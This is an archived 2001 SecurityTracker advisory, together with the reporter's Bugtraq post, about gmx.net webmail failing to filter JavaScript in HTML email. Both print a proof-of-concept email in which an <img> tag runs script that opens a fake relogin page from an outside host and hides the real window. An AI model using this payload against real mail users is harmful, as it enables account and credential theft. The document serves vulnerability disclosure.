SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
About the Archives
Want to learn about the SecurityTracker archives? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (E-mail Server)  >  Gmx.net Vendors:  GMX
Gmx.net Web-Based E-mail System Lets Remote Users Execute Arbitrary Code on the User's Browser
Date:  Jun 12 2001 17:34 (UTC/GMT)
Impact:  Execution of arbitrary code via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Description:  A vulnerability has been reported in the gmx.net web-based e-mail system that lets remote users execute arbitrary code on the user's browser.

The system reportedly has a vulnerability that fails to properly filter Javascript in HTML-based e-mail messages.

A remote user can place Javascript within the <img> tag.

An example demonstration trojan is provided:

<html><body> <img src="javascript:
gmx=window.open('http://[host]/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resi
.focus();">
<h4 >mungo baby</h4></body></html>
Impact:  A remote user can send HTML-based e-mail to a user such that the user's browser will execute trojan Javascript code when the e-mail is viewed (this requires Javascript to be enabled on the user's browser).
Solution:  The vendor is preparing a fix, to be released shortly.
Vendor URL:  www.gmx.net/ (Links to External Site)
Cause:  Input validation error
Reported By:  "rudi carell" <rudicarell@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Mon, 11 Jun 2001 09:31:04
From:  "rudi carell" <rudicarell@hotmail.com>
Subject:  gmx.net

 


good morning buqtraq,

gmx.net is a european-based free web-mail-, web-community system comparable 
with hotmail.com.

like many other web-mail systems gmx.net has a problem filtering java-script 
in html-based mail-messages.

this enables an attacker to create html-messages with malicious java-script 
embedded.

problem description:

the html - <img> tag can be used to embedd malicious
java-scripts within html-mails

once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser(if enabled:-) this 
makes it possible to place trojans and execute URL-based webmail-commands 
leading to a compromise of the users webmail-account.

sample with "classic" relogin-trojan:

---cut here---

<html><body> <img src="javascript: 
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.b
lur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHe
ight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx
.focus();">
<h4>mungo baby</h4></body></html>

---cut here---

.. not very sophisticated but working... changing user-options would be more 
elaborate ..


nice day,


rc

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com





vendor status: mail has been sent to security@gmx.net


RC-EOF
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2001, SecurityGlobal.net LLC